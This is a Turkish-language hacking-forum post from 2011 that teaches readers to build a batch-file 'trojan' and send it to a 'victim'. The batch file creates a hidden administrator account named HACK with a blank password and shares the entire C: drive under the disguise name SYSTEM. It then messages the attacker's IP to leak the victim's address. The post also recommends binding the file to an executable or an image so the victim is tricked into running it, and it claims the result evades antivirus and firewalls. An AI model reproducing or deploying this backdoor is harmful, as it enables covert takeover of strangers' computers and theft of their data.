SNATCHCOD
Would you like to react to this message? Create an account in a few clicks or log in to continue.

TROJAN VİRÜSÜ YAPIMI

Aşağa gitmek

TROJAN VİRÜSÜ YAPIMI Empty TROJAN VİRÜSÜ YAPIMI

Mesaj  Admin Salı Kas. 29, 2011 6:05 pm



Evet arkadaşlar, konunun başlıgından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir trojan yapmayı size kısaca anlatacagım;



Trojanin ana amacı, adından da anlaşılacagı gibi hedef sisteme sızarak ya ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir



Piyasada bu konuda son derece fonksiyonel birçok Trojan var fakat bu trojanlari kodlayanlarin hepsi Ticari amaç güttükleri için ki bu konuda da sonuna kadar haklıdırlar, Trojanların Special Edition olan versiyonlarinin dışındaki tüm Public versiyonları malesef AV lerce tanınmakta ve hepsinden önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanıcıların işini oldukca zorlaştırmaktadır.



Size şimdi anlatacagım yöntem, biraz mantık biraz da teknik bilgi gerektirmektedir. Bu ikisinin dışında başka hiçbir toola ihtiyacınız yoktur.



şimdi Trojanımızı hazırlamaya başlayalım;



1-) Öncelikle bir TXT dosyasi açın ve içine şu komutu girin;



net user HACK /add



Bu komut sayesinde kurbanın makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak acıldıgı için hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;



2-) Simdi yukarıdakı komutun hemen bir alt satırına geçin ve şu komutu ekleyin;



net localgroup administrators HACK /add



Böylece "HACK" isimli kullanıcı hesabını, direk Administrator grubuna kattik. Artık "HACK" hesabımız tüm yetkilere sahip.



3-) şimdi de kurbanımızın makinasındaki C: sürücüsünü sınırsız paylasıma açacagız. Kurbanı da huylandırmamak için paylasım adını SYSTEM olarak set edecegiz. Bunun için aşagıdaki komutu kullanacagız;



net share system=C: /unlimited



Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bilecegiz de kurbanın makinasına bu yarattigımız "HACK" hesabından baglanacagız?



Bunun için de kodumuza bir satırlık bir komut daha ekleyecegiz;



4-) NET SEND komutunu kullanarak kurbanin bize Windows'sun Messenger Servisi vasitası ile mesaj atmasını ve IP sini bize söylemesini saglayacagız. Bunun için aşagıdaki komutu da kodunuzun içerisine ekleyin;



net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan



Unutmayin 82. li başlayan IP adresi yerine kendi IP nizi yazın.



4-) Son olarak ufak bir önlem alacagız. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen birçok ufak tefek Spylar oldugu için Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir işe yaramaz. DOS komut satırında yardımcı ekler olmadıkca da herhangi bir Disabled servisi Enable bildigim kadarı ile edemeyiz. Fakat eğer Disabled degil de Manuel ise o zaman Messenger servisini çalıstırabiliriz. Bu son önlemimizde de Manuel olan ve çalısmayan Messenger servisini çalıştıracagız.



Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod içerisinde kullanacagimiz adını öğreniyoruz. Adı Messenger 'miş. şimdi bu adı kullanarak bu servisi çalıstırıyoruz.



net start Messenger



Size tavsiyem, bu son komutu kodunuzun en başına koymanız. Böylelikle hardisik sırada önce Messenger servisi çalıstırılacak daha sonra diger işlemler yapılacaktır. Kodun saglıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.



Son olarak TXT de yazdıgınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir .EXE ile join ettirin ister bir resim ile birleştirin isterseniz kurbanınıza direk gönderin.



Kurbanınız bu dosyayı calıştırdıgı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C: sürücüsü de full olarak paylasıma acılmış olacak ve son olarak da IP si size gelecektir.



Artık IP sini de bildiginize göre, ister DOS komut satırına düşerek direk HACK kullanıcısına baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylaşıma açtırdıgınız C: sürücüsüne sızar istediginizi yaparsıniz.



Işin en güzel tarafi, yukarıdaki BAT dosyasının tamamen Microsoftun bize sunduğu DOS komutları kullanılarak hazırlanmış olması nedeni ile hiçbir Anti Virüse yakalanmaması ve "HACK" kullanıcısına direk Admin olarak baglandığınız için hiçbir personal firewal tarafından engellenmemesidir.kolay gelsin arkadaşalar...............

Admin
Admin

Mesaj Sayısı : 2
Kayıt tarihi : 28/11/11

https://snatchcod.yetkin-forum.com

Sayfa başına dön Aşağa gitmek

Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz